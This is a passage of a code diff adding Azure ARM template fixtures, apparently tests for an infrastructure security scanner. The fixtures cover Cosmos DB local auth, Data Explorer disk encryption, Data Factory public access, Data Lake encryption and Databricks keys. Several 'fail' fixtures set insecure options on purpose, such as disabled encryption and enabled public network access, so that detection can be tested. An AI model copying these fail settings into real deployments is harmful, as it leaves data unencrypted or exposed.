+      "version": "0.12.40.16777",
+      "templateHash": "13150321745581597627"
+    }
+  },
+  "parameters": {
+    "accountName": {
+      "type": "string",
+      "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Cosmos DB account name, max length 44 characters"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for the Cosmos DB account."
+      }
+    },
+    "defaultConsistencyLevel": {
+      "type": "string",
+      "defaultValue": "Session",
+      "metadata": {
+        "description": "The default consistency level of the Cosmos DB account."
+      },
+      "allowedValues": [
+        "Eventual",
+        "ConsistentPrefix",
+        "Session",
+        "BoundedStaleness",
+        "Strong"
+      ]
+    },
+    "maxStalenessPrefix": {
+      "type": "int",
+      "defaultValue": 100000,
+      "metadata": {
+        "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+      },
+      "maxValue": 2147483647,
+      "minValue": 10
+    },
+    "maxIntervalInSeconds": {
+      "type": "int",
+      "defaultValue": 300,
+      "metadata": {
+        "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+      },
+      "maxValue": 86400,
+      "minValue": 5
+    }
+  },
+  "variables": {
+    "consistencyPolicy": {
+      "Eventual": {
+        "defaultConsistencyLevel": "Eventual"
+      },
+      "ConsistentPrefix": {
+        "defaultConsistencyLevel": "ConsistentPrefix"
+      },
+      "Session": {
+        "defaultConsistencyLevel": "Session"
+      },
+      "BoundedStaleness": {
+        "defaultConsistencyLevel": "BoundedStaleness",
+        "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+        "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+      },
+      "Strong": {
+        "defaultConsistencyLevel": "Strong"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "fail1",
+      "location": "[parameters('location')]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "disableLocalAuth": false,
+        "databaseAccountOfferType": "Standard",
+        "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]",
+            "failoverPriority": 0,
+            "isZoneRedundant": false
+          }
+        ],
+        "capabilities": [
+          {
+            "name": "EnableServerless"
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json
new file mode 100644
index 00000000000..1e0ca9c5134
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/pass.json
@@ -0,0 +1,106 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.12.40.16777",
+      "templateHash": "13150321745581597627"
+    }
+  },
+  "parameters": {
+    "accountName": {
+      "type": "string",
+      "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Cosmos DB account name, max length 44 characters"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for the Cosmos DB account."
+      }
+    },
+    "defaultConsistencyLevel": {
+      "type": "string",
+      "defaultValue": "Session",
+      "metadata": {
+        "description": "The default consistency level of the Cosmos DB account."
+      },
+      "allowedValues": [
+        "Eventual",
+        "ConsistentPrefix",
+        "Session",
+        "BoundedStaleness",
+        "Strong"
+      ]
+    },
+    "maxStalenessPrefix": {
+      "type": "int",
+      "defaultValue": 100000,
+      "metadata": {
+        "description": "Max stale requests. Required for BoundedStaleness. Valid ranges, Single Region: 10 to 2147483647. Multi Region: 100000 to 2147483647."
+      },
+      "maxValue": 2147483647,
+      "minValue": 10
+    },
+    "maxIntervalInSeconds": {
+      "type": "int",
+      "defaultValue": 300,
+      "metadata": {
+        "description": "Max lag time (minutes). Required for BoundedStaleness. Valid ranges, Single Region: 5 to 84600. Multi Region: 300 to 86400."
+      },
+      "maxValue": 86400,
+      "minValue": 5
+    }
+  },
+  "variables": {
+    "consistencyPolicy": {
+      "Eventual": {
+        "defaultConsistencyLevel": "Eventual"
+      },
+      "ConsistentPrefix": {
+        "defaultConsistencyLevel": "ConsistentPrefix"
+      },
+      "Session": {
+        "defaultConsistencyLevel": "Session"
+      },
+      "BoundedStaleness": {
+        "defaultConsistencyLevel": "BoundedStaleness",
+        "maxStalenessPrefix": "[parameters('maxStalenessPrefix')]",
+        "maxIntervalInSeconds": "[parameters('maxIntervalInSeconds')]"
+      },
+      "Strong": {
+        "defaultConsistencyLevel": "Strong"
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "kind": "GlobalDocumentDB",
+      "properties": {
+        "disableLocalAuth": true,
+        "databaseAccountOfferType": "Standard",
+        "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]",
+            "failoverPriority": 0,
+            "isZoneRedundant": false
+          }
+        ],
+        "capabilities": [
+          {
+            "name": "EnableServerless"
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json
new file mode 100644
index 00000000000..aa514eb8b61
--- /dev/null
+++ b/tests/arm/checks/resource/example_CosmosDBLocalAuthDisabled/unknown.json
@@ -0,0 +1,91 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.9.1.41621",
+      "templateHash": "17090762923867278967"
+    }
+  },
+  "parameters": {
+    "accountName": {
+      "type": "string",
+      "defaultValue": "[format('sql-{0}', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Cosmos DB account name, max length 44 characters"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for the Cosmos DB account."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "unknown",
+      "location": "[parameters('location')]",
+      "kind": "MongoDB",
+      "properties": {
+        "databaseAccountOfferType": "Standard",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]"
+          }
+        ]
+      }
+    },
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "unknown",
+      "kind": "MongoDB",
+      "properties": {
+        "databaseAccountOfferType": "Standard",
+        "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]",
+            "failoverPriority": 0,
+            "isZoneRedundant": false
+          }
+        ],
+        "capabilities": [
+          {
+            "name": "EnableServerless"
+          }
+        ],
+        "disableLocalAuth": true
+      }
+    },
+    {
+      "type": "Microsoft.DocumentDB/databaseAccounts",
+      "apiVersion": "2022-05-15",
+      "name": "unknown",
+      "location": "[parameters('location')]",
+      "kind": "MongoDB",
+      "properties": {
+        "databaseAccountOfferType": "Standard",
+        "consistencyPolicy": "[variables('consistencyPolicy')[parameters('defaultConsistencyLevel')]]",
+        "locations": [
+          {
+            "locationName": "[parameters('location')]",
+            "failoverPriority": 0,
+            "isZoneRedundant": false
+          }
+        ],
+        "capabilities": [
+          {
+            "name": "EnableServerless"
+          }
+        ],
+        "disableLocalAuth": false
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
new file mode 100644
index 00000000000..da1b0618d29
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json
@@ -0,0 +1,186 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "11556612112757819680"
+    }
+  },
+  "parameters": {
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources"
+      }
+    },
+    "clusterName": {
+      "type": "string",
+      "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "Name of the cluster"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "Standard_D12_v2",
+      "metadata": {
+        "description": "Name of the sku"
+      }
+    },
+    "skuCapacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "maxValue": 1000,
+      "minValue": 2,
+      "metadata": {
+        "description": "# of nodes"
+      }
+    },
+    "databaseName": {
+      "type": "string",
+      "defaultValue": "kustodb",
+      "metadata": {
+        "description": "Name of the database"
+      }
+    },
+    "eventHubNamespaceName": {
+      "type": "string",
+      "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "Name of Event Hub's namespace"
+      }
+    },
+    "eventHubName": {
+      "type": "string",
+      "defaultValue": "kustoHub",
+      "metadata": {
+        "description": "Name of Event Hub"
+      }
+    }
+  },
+  "variables": {
+    "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde",
+    "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]",
+    "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]",
+    "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventHub/namespaces/eventhubs/consumergroups",
+      "apiVersion": "2021-11-01",
+      "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+      "properties": {},
+      "dependsOn": [
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.EventHub/namespaces/eventhubs",
+      "apiVersion": "2021-11-01",
+      "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+      "properties": {
+        "messageRetentionInDays": 2,
+        "partitionCount": 2
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases/scripts",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]",
+      "properties": {
+        "scriptContent": "//  Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n//  Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n//  We modify the ingestion batching policy to make it easy to see records coming ingestion\n//  THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION:  MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"",
+        "continueOnErrors": false
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases/dataConnections",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]",
+      "location": "[parameters('location')]",
+      "kind": "EventHub",
+      "properties": {
+        "compression": "None",
+        "consumerGroup": "kustoConsumerGroup",
+        "dataFormat": "MULTIJSON",
+        "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+        "eventSystemProperties": [
+          "x-opt-enqueued-time"
+        ],
+        "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+        "mappingRuleName": "DirectJson",
+        "tableName": "RawEvents"
+      },
+      "dependsOn": [
+        "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+        "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]",
+        "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]",
+      "location": "[parameters('location')]",
+      "kind": "ReadWrite",
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.EventHub/namespaces",
+      "apiVersion": "2021-11-01",
+      "name": "[parameters('eventHubNamespaceName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "capacity": 1,
+        "name": "Standard",
+        "tier": "Standard"
+      },
+      "properties": {}
+    },
+    {
+      "type": "Microsoft.Kusto/clusters",
+      "apiVersion": "2022-02-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('skuName')]",
+        "tier": "Standard",
+        "capacity": "[parameters('skuCapacity')]"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "enableDiskEncryption":false
+      }
+    },
+    {
+      "type": "Microsoft.Authorization/roleAssignments",
+      "apiVersion": "2021-04-01-preview",
+      "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+      "name": "[variables('roleAssignmentName')]",
+      "properties": {
+        "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster",
+        "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]",
+        "principalType": "ServicePrincipal",
+        "roleDefinitionId": "[variables('fullDataReceiverId')]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json
new file mode 100644
index 00000000000..a86aa7945a7
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json
@@ -0,0 +1,186 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.5.6.12127",
+      "templateHash": "11556612112757819680"
+    }
+  },
+  "parameters": {
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources"
+      }
+    },
+    "clusterName": {
+      "type": "string",
+      "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "Name of the cluster"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "Standard_D12_v2",
+      "metadata": {
+        "description": "Name of the sku"
+      }
+    },
+    "skuCapacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "maxValue": 1000,
+      "minValue": 2,
+      "metadata": {
+        "description": "# of nodes"
+      }
+    },
+    "databaseName": {
+      "type": "string",
+      "defaultValue": "kustodb",
+      "metadata": {
+        "description": "Name of the database"
+      }
+    },
+    "eventHubNamespaceName": {
+      "type": "string",
+      "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]",
+      "metadata": {
+        "description": "Name of Event Hub's namespace"
+      }
+    },
+    "eventHubName": {
+      "type": "string",
+      "defaultValue": "kustoHub",
+      "metadata": {
+        "description": "Name of Event Hub"
+      }
+    }
+  },
+  "variables": {
+    "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde",
+    "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]",
+    "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]",
+    "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.EventHub/namespaces/eventhubs/consumergroups",
+      "apiVersion": "2021-11-01",
+      "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+      "properties": {},
+      "dependsOn": [
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.EventHub/namespaces/eventhubs",
+      "apiVersion": "2021-11-01",
+      "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+      "properties": {
+        "messageRetentionInDays": 2,
+        "partitionCount": 2
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases/scripts",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]",
+      "properties": {
+        "scriptContent": "//  Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n//  Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n//  We modify the ingestion batching policy to make it easy to see records coming ingestion\n//  THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION:  MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"",
+        "continueOnErrors": false
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases/dataConnections",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]",
+      "location": "[parameters('location')]",
+      "kind": "EventHub",
+      "properties": {
+        "compression": "None",
+        "consumerGroup": "kustoConsumerGroup",
+        "dataFormat": "MULTIJSON",
+        "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+        "eventSystemProperties": [
+          "x-opt-enqueued-time"
+        ],
+        "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+        "mappingRuleName": "DirectJson",
+        "tableName": "RawEvents"
+      },
+      "dependsOn": [
+        "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]",
+        "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]",
+        "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]"
+      ]
+    },
+    {
+      "type": "Microsoft.Kusto/clusters/databases",
+      "apiVersion": "2022-02-01",
+      "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]",
+      "location": "[parameters('location')]",
+      "kind": "ReadWrite",
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]"
+      ]
+    },
+    {
+      "type": "Microsoft.EventHub/namespaces",
+      "apiVersion": "2021-11-01",
+      "name": "[parameters('eventHubNamespaceName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "capacity": 1,
+        "name": "Standard",
+        "tier": "Standard"
+      },
+      "properties": {}
+    },
+    {
+      "type": "Microsoft.Kusto/clusters",
+      "apiVersion": "2022-02-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('skuName')]",
+        "tier": "Standard",
+        "capacity": "[parameters('skuCapacity')]"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "enableDiskEncryption":true
+      }
+    },
+    {
+      "type": "Microsoft.Authorization/roleAssignments",
+      "apiVersion": "2021-04-01-preview",
+      "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]",
+      "name": "[variables('roleAssignmentName')]",
+      "properties": {
+        "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster",
+        "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]",
+        "principalType": "ServicePrincipal",
+        "roleDefinitionId": "[variables('fullDataReceiverId')]"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]",
+        "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json
new file mode 100644
index 00000000000..d732f0dc6db
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail.json
@@ -0,0 +1,12 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataFactory/factories",
+      "apiVersion": "2018-06-01",
+      "name": "fail1",
+      "location": "[resourceGroup().location]"
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json
new file mode 100644
index 00000000000..32f6a1e113c
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/fail2.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataFactory/factories",
+      "apiVersion": "2018-06-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json
new file mode 100644
index 00000000000..5f1ca41b965
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataFactoryNoPublicNetworkAccess/pass.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataFactory/factories",
+      "apiVersion": "2018-06-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json
new file mode 100644
index 00000000000..30df0cfd22e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/fail.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataLakeStore/accounts",
+      "apiVersion": "2016-11-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "encryptionState": "Disabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json
new file mode 100644
index 00000000000..41e61ca2d85
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass.json
@@ -0,0 +1,14 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataLakeStore/accounts",
+      "apiVersion": "2016-11-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json
new file mode 100644
index 00000000000..b18d516b9ce
--- /dev/null
+++ b/tests/arm/checks/resource/example_DataLakeStoreEncryption/pass2.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.DataLakeStore/accounts",
+      "apiVersion": "2016-11-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "encryptionState": "Enabled"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json
new file mode 100644
index 00000000000..b8ca21f4a5b
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json
@@ -0,0 +1,68 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
+              "type": "string"
+            },
+            "workspaceName": {
+              "type": "string",
+              "metadata": {
+                "description": "The name of the Azure Databricks workspace to create."
+              }
+            },
+            "location": {
+              "type": "string",
+              "metadata": {
+                "description": "Location for all resources."
+              }
+            },
+            "pricingTier": {
+              "type": "string",
+              "allowedValues": [
+                "standard",
+                "premium"
+              ],
+              "metadata": {
+                "description": "The pricing tier of workspace."
+              }
+            },
+            "keyVaultName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault name."
+              }
+            },
+            "keyName": {
+              "type": "string",
+              "metadata": {
+                "description": "The Azure Key Vault encryption key name."
+              }
+            },
+            "disablePublicIp": {
+              "type": "bool",
+              "metadata": {
+                "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+              }
+            }
+          },
+          "resources": [
+            {
+              "type": "Microsoft.Databricks/workspaces",
+              "apiVersion": "2023-02-01",
+              "name": "[parameters('workspaceName')]",
+              "location": "[parameters('location')]",
+              "sku": {
+                "name": "[parameters('pricingTier')]"
+              },
+              "properties": {
+                "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+                "parameters": {
+                  "enableNoPublicIp": {
+                    "value": "[parameters('disablePublicIp')]"
+                  }
+                }
+              }
+            }
+          ]
+        }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json
new file mode 100644
index 00000000000..04be1022e1e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json
@@ -0,0 +1,71 @@
+{
+          "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+          "contentVersion": "1.0.0.0",
+          "parameters": {
+            "managedResourceGroupName": {
